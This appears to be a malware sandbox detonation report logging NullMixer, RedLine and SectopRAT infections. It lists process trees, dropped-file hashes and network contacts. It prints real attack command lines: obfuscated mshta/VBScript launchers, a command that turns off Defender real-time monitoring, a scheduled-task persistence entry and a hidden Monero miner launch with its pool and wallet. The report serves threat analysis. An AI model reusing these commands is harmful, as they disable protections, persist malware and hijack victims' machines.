"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp" /SL5="$C0042,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1992 -ip 1992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1660
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5048 -ip 5048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1016
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe
"C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2944 -ip 2944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 780
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
Files
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
C:\Users\Admin\AppData\Local\Temp\inst2.exe
C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
C:\Users\Admin\AppData\Local\Temp\4.exe
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
C:\Users\Admin\AppData\Local\Temp\setup.exe
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp
C:\Users\Admin\AppData\Local\Temp\8.exe
C:\Users\Admin\AppData\Local\Temp\is-OR5S1.tmp\idp.dll
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
C:\Users\Admin\AppData\Local\Temp\is-6NVNL.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\INetC.dll
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
C:\Users\Admin\AppData\Local\Temp\nsu9E36.tmp\System.dll
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | a301ebde2b21398e796398cd7c973296 |
| SHA1 | 4e417ba63cde94f776843e1208013b537571e9a8 |
| SHA256 | 602099bed23abfc1c5f2aea2592a2bc2a7d6c3e911b984e32c16dfc30db1a04f |
| SHA512 | 99b8696cc1f1f7a12706cc71fae6601ac64bca2f772e4ffac7972e3529204c75e1dd6f7537f35849ca6b6ec7813c8f633c03dd41fd20d1aa038dcbc17f27ddb4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 67e486b2f148a3fca863728242b6273e |
| SHA1 | 452a84c183d7ea5b7c015b597e94af8eef66d44a |
| SHA256 | facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb |
| SHA512 | d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 84b7af9d76223783b896008964b883ce |
| SHA1 | d9d89432969372eb5fb7aba6c710de9c67f47245 |
| SHA256 | 4c3dace7ea81bd11cf97b84357dcfb49533fbfc80f2f0cc3e617491e41722088 |
| SHA512 | cd26c958313b158fd146f9dcd79b1fe8aae0c7d2a8220373b35454fd8889e91d8425be98d6d470735996fae8c8848afa92027f86941e8faca1349eb97d317c01 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ
| MD5 | e1caa9cc3b8bd60f12093059981f3679 |
| SHA1 | f35d8b851dc0222ae8294b28bd7dee339cc0589b |
| SHA256 | 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565 |
| SHA512 | 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V
| MD5 | 51424c68f5ff16380b95f917c7b78703 |
| SHA1 | 70aa922f08680c02918c765daf8d0469e5cd9e50 |
| SHA256 | 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315 |
| SHA512 | c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou
| MD5 | 112b8c9fa0419875f26ca7b592155f2b |
| SHA1 | 0b407062b6e843801282c2dc0c3749f697a67300 |
| SHA256 | 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202 |
| SHA512 | a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w
| MD5 | 8b4e06aede42785b01c3cdf3f0883da6 |
| SHA1 | 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a |
| SHA256 | 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42 |
| SHA512 | 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
| MD5 | b245679121623b152bea5562c173ba11 |
| SHA1 | 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d |
| SHA256 | 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f |
| SHA512 | 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 816520bddbb9cd95a5904ba5c6626989 |
| SHA1 | d6aca0489429c82eab0f5e213f1ca93648a36eb2 |
| SHA256 | 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a |
| SHA512 | 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
150s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2100 set thread context of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe |
| PID 580 set thread context of 1156 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
